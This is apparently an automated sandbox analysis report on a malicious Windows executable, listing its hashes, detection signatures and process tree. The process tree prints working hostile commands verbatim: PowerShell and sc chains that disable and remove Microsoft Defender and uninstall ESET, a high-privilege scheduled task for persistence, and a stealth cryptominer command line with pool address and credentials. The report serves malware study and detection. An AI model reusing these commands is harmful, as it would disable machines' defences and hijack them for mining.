Analysis

  • max time kernel
    143s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-01-2024 15:19

General

  • Target

    3eaf5c311f690177a99c5ec95a22141f.exe

  • Size

    6.4MB

  • MD5

    3eaf5c311f690177a99c5ec95a22141f

  • SHA1

    c02da138a3a10b34b0f1bd6d621a086c23e267bf

  • SHA256

    6d98a1918e9e369bd93004139d60fe0a4091fd922e2b6360e082b6393e41b33b

  • SHA512

    bf842f8e5c660e1ee9ed27541334c1ba8b70e4e87d05ac83acc7dd1d26b420cd85c874a1668239f0e035a8748992bbdec2a2843e3e07d3c5398573b3c854e2e3

  • SSDEEP

    196608:bKrD7Ptz/yNGti995FNIew3JfOFzOtNPxj:kPN/HmTZwEzODJ

Score
8/10

Malware Config

Signatures

  • Stops running service(s) 3 TTPs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

Processes

  • C:\Users\Admin\AppData\Local\Temp\3eaf5c311f690177a99c5ec95a22141f.exe
    "C:\Users\Admin\AppData\Local\Temp\3eaf5c311f690177a99c5ec95a22141f.exe"
    1⤵
      PID:4756
      • C:\Users\Admin\AppData\Local\Temp\Desktop.exe
        "C:\Users\Admin\AppData\Local\Temp\Desktop.exe"
        2⤵
          PID:1596
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\start.bat" "
            3⤵
              PID:4324
              • C:\Program Files (x86)\CLoader__.exe
                CLoader__ -pimortale -dC:\Program Files (x86)
                4⤵
                  PID:4288
                  • C:\Program\CLoader.exe
                    "C:\Program\CLoader.exe"
                    5⤵
                      PID:1664
                  • C:\Program Files (x86)\CLoader_.exe
                    CLoader_ -pimortale2 -dC:\Program Files (x86)
                    4⤵
                      PID:4348
                      • C:\Program\CLoader 12.5C.exe
                        "C:\Program\CLoader 12.5C.exe"
                        5⤵
                          PID:3204
                      • C:\Program Files (x86)\CLoader___.exe
                        CLoader___ -pimortale3 -dC:\Program Files (x86)
                        4⤵
                          PID:4956
                          • C:\Program\Loader.exe
                            "C:\Program\Loader.exe"
                            5⤵
                              PID:4864
                              • C:\Windows\SYSTEM32\cmd.exe
                                "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
                                6⤵
                                  PID:4756
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Program'
                                    7⤵
                                      PID:4464
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                      7⤵
                                        PID:3176
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                        7⤵
                                          PID:4408
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                          7⤵
                                            PID:2108
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command Set-MpPreference -DisableArchiveScanning $true
                                            7⤵
                                              PID:3016
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
                                              7⤵
                                                PID:2528
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
                                                7⤵
                                                  PID:1244
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command Set-MpPreference -DisableScriptScanning $true
                                                  7⤵
                                                    PID:3480
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
                                                    7⤵
                                                      PID:1676
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command Set-MpPreference -DisableIOAVProtection $true
                                                      7⤵
                                                        PID:4468
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
                                                        7⤵
                                                          PID:1988
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
                                                          7⤵
                                                            PID:5104
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -Command Set-MpPreference -MAPSReporting Disabled
                                                            7⤵
                                                              PID:4192
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                                                              7⤵
                                                                PID:4932
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop WinDefend
                                                                7⤵
                                                                • Launches sc.exe
                                                                PID:5080
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Stop-Service WinDefend
                                                                7⤵
                                                                  PID:436
                                                                • C:\Windows\system32\sc.exe
                                                                  sc config WinDefend start=disabled
                                                                  7⤵
                                                                  • Launches sc.exe
                                                                  PID:3144
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -Command Set-Service WinDefend -StartupType Disabled
                                                                  7⤵
                                                                    PID:4104
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
                                                                    7⤵
                                                                      PID:2056
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
                                                                      7⤵
                                                                        PID:1080
                                                                      • C:\Windows\system32\Dism.exe
                                                                        Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
                                                                        7⤵
                                                                          PID:5096
                                                                          • C:\Users\Admin\AppData\Local\Temp\224BBD28-45EF-44DF-ACAF-189F06D7A3F3\dismhost.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\224BBD28-45EF-44DF-ACAF-189F06D7A3F3\dismhost.exe {26AE7B60-7EE1-4BEF-87DF-9396E8BE8A98}
                                                                            8⤵
                                                                              PID:4328
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            Wmic Product where name="Eset Security" call uninstall
                                                                            7⤵
                                                                              PID:4240
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
                                                                            6⤵
                                                                              PID:1460
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
                                                                                7⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:3204
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                              6⤵
                                                                                PID:3352
                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                  "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
                                                                                  7⤵
                                                                                    PID:3720
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Program'
                                                                                      8⤵
                                                                                        PID:1568
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                        8⤵
                                                                                          PID:5108
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                          8⤵
                                                                                            PID:3436
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                            8⤵
                                                                                              PID:4160
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -Command Set-MpPreference -DisableArchiveScanning $true
                                                                                              8⤵
                                                                                                PID:2520
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
                                                                                                8⤵
                                                                                                  PID:1468
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                  8⤵
                                                                                                    PID:1384
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -Command Set-MpPreference -DisableScriptScanning $true
                                                                                                    8⤵
                                                                                                      PID:3756
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
                                                                                                      8⤵
                                                                                                        PID:4580
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command Set-MpPreference -DisableIOAVProtection $true
                                                                                                        8⤵
                                                                                                          PID:436
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
                                                                                                          8⤵
                                                                                                            PID:5104
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
                                                                                                            8⤵
                                                                                                              PID:2344
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -Command Set-MpPreference -MAPSReporting Disabled
                                                                                                              8⤵
                                                                                                                PID:5108
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                                                                                                                8⤵
                                                                                                                  PID:3604
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -Command Stop-Service WinDefend
                                                                                                                  8⤵
                                                                                                                    PID:4012
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc stop WinDefend
                                                                                                                    8⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:1592
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc config WinDefend start=disabled
                                                                                                                    8⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:5016
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command Set-Service WinDefend -StartupType Disabled
                                                                                                                    8⤵
                                                                                                                      PID:1132
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
                                                                                                                      8⤵
                                                                                                                        PID:2408
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
                                                                                                                        8⤵
                                                                                                                          PID:4160
                                                                                                                        • C:\Windows\system32\Dism.exe
                                                                                                                          Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
                                                                                                                          8⤵
                                                                                                                            PID:3376
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\86ECC4A2-7EDB-4948-81A1-05624603B92B\dismhost.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\86ECC4A2-7EDB-4948-81A1-05624603B92B\dismhost.exe {ECC9084C-831A-4B2D-8804-1252A3FB1B6C}
                                                                                                                              9⤵
                                                                                                                                PID:5108
                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                              Wmic Product where name="Eset Security" call uninstall
                                                                                                                              8⤵
                                                                                                                                PID:1244
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Services.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\Services.exe"
                                                                                                                            6⤵
                                                                                                                              PID:4912
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
                                                                                                                                7⤵
                                                                                                                                  PID:3960
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
                                                                                                                                    8⤵
                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                    PID:768
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:1360
                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
                                                                                                                                      8⤵
                                                                                                                                        PID:2112
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Program'
                                                                                                                                          9⤵
                                                                                                                                            PID:1288
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                            9⤵
                                                                                                                                              PID:988
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                              9⤵
                                                                                                                                                PID:2052
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                9⤵
                                                                                                                                                  PID:4192
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -Command Set-MpPreference -DisableArchiveScanning $true
                                                                                                                                                  9⤵
                                                                                                                                                    PID:2612
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
                                                                                                                                                    9⤵
                                                                                                                                                      PID:4140
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                                                                      9⤵
                                                                                                                                                        PID:3556
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -Command Set-MpPreference -DisableScriptScanning $true
                                                                                                                                                        9⤵
                                                                                                                                                          PID:3280
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
                                                                                                                                                          9⤵
                                                                                                                                                            PID:1080
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -Command Set-MpPreference -DisableIOAVProtection $true
                                                                                                                                                            9⤵
                                                                                                                                                              PID:2496
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
                                                                                                                                                              9⤵
                                                                                                                                                                PID:4696
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:2404
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -Command Set-MpPreference -MAPSReporting Disabled
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:5004
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:988
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      sc stop WinDefend
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:4528
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -Command Stop-Service WinDefend
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:1464
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        sc config WinDefend start=disabled
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:3780
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -Command Set-Service WinDefend -StartupType Disabled
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:5092
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:4740
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:3964
                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6056254 --pass=Skeetv2 --cpu-max-threads-hint=30 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:2748
                                                                                                                                                              • C:\Program Files\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Program\CLoader 12.5C.exe" org.develnext.jphp.ext.javafx.FXLauncher
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1480
                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                    C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                    PID:332
                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                  "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2404
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Program'
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5088
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4356
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3960
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:3604
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -Command Set-MpPreference -DisableArchiveScanning $true
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2908
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:1368
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1456
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell -Command Set-MpPreference -DisableScriptScanning $true
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2916
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2184
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell -Command Set-MpPreference -DisableIOAVProtection $true
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:2376
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:1948
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4808
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell -Command Set-MpPreference -MAPSReporting Disabled
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:3936
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4556
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -Command Stop-Service WinDefend
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:2760
                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                    sc stop WinDefend
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:1216
                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                    sc config WinDefend start=disabled
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:4568
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -Command Set-Service WinDefend -StartupType Disabled
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4376
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2648
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:2596
                                                                                                                                                                                                        • C:\Windows\system32\Dism.exe
                                                                                                                                                                                                          Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:2056
